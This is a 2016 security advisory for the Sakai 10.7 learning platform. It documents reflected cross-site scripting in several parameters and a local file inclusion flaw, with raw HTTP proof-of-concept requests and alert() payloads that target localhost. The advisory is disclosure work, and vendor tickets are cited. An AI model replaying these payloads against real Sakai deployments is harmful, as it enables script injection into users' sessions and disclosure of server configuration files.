Sakai 10.7 Cross Site Scripting / Local File Inclusion

Published: 22 Aug 2016 | Reported by: LiquidWorm | Source: packetstorm (packetstormsecurity.com)

Sakai 10.7 Multiple Vulnerabilities including Cross-Site Scripting and Local File Inclusion

Sakai 10.7 Multiple Vulnerabilities  
  
  
Vendor: Apereo Foundation  
Product web page: https://www.sakaiproject.org  
Affected version: 10.7 (Kernel 10.7)  
  
Summary: Sakai is a free, community source, educational software  
platform designed to support teaching, research and collaboration.  
Systems of this type are also known as Course Management Systems (CMS),  
Learning Management Systems (LMS), or Virtual Learning Environments (VLE).  
  
Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities:  
input passed via several parameters to several scripts is not properly sanitized  
before being returned to the user. This can be exploited to execute arbitrary HTML  
and script code in a user's browser session in the context of an affected site.  
There is also a file disclosure vulnerability when calling a custom tool script: the  
requested path is not properly verified before being used to read files. This can be  
exploited to disclose the contents of files from local resources.  
  
Tested on: Apache-Coyote/1.1  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5358  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php  
  
Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)  
https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)  
https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)  
https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)  
  
  
  
29.06.2016  
  
--  
  
  
XSS when using file upload (filename parameter):  
------------------------------------------------  
  
POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1  
Host: localhost:8080  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Connection: close  
  
------WebKitFormBoundaryViazQNB5ok9E64l2  
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"  
Content-Type: application/octet-stream  
  
testingus  
------WebKitFormBoundaryViazQNB5ok9E64l2--  
  
  
Response:  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
X-UA-Compatible: IE=EmulateIE11  
Cache-Control: no-cache  
Content-Type: text/html;charset=UTF-8  
Content-Length: 383  
Date: Wed, 29 Jun 2016 11:45:49 GMT  
Connection: close  
  
<script type="text/javascript">  
(function(){ var d = document.domain ; while ( true ) {  
try { var test = parent.document.domain ; break ; } catch( e ) {}  
d = d.replace( /.*?(?:\.|$)/, '' ) ; if ( d.length == 0 ) break ;  
try { document.domain = d ; } catch (e) { break ; }}})() ;  
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');  
</script>  
  
  
  
  
XSS when creating a job (After creating a job, click on "Triggers" link):  
-------------------------------------------------------------------------  
  
GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1  
Host: localhost:8080  
  
  
  
XSS in URI:  
-----------  
  
GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1  
Host: localhost:8080  
  
  
LFI when calling a custom tool (affects Apache Wicket tools such as Profile2 and Statistics;  
adding "../" is not needed to reproduce the issue, which can be reproduced just by visiting  
/portal/tool/[TOOL_ID]/WEB-INF/web.xml):  
-------------------------------------------------------------------------------------------  
  
GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1  
Host: localhost:8080  
  
